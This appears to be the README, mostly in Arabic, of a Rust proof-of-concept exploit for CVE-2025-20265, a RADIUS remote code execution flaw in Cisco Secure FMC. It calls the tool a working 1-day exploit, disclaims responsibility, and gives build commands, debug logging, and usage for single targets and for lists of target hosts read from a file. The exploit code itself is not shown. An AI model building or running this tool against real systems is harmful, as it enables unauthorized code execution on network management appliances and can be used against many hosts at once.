
PoC لـ CVE-2025-20265: ثغرة تنفيذ التعليمات البرمجية عن بُعد عبر RADIUS في برنامج Cisco Secure FMC
هذا استغلال فعّال لثغرة من نوع 1-day.
استخدمه على مسؤوليتك الخاصة. أنت مسؤول عن أفعالك.
cargo build --release
$ ./target/release/cve_2025_20265 --help
# or
$ cargo run --release -- --help
للتصحيح، استخدم متغير البيئة RUST_LOG:
RUST_LOG=debug cargo run --release -- --help
# use either the build or the path to the executable file
$ alias EXE="cargo run --release"
# or
$ cargo build --release
$ alias EXE="./target/release/cve_2025_20265"
# check the target
$ EXE https://10.10.10.1:4443/
# read targets from the file
$ echo -e "https://10.10.10.1:4443\nhttp://127.0.0.1\nhttp://10.10.10.10" > targets.txt
$ EXE --from-file targets.txt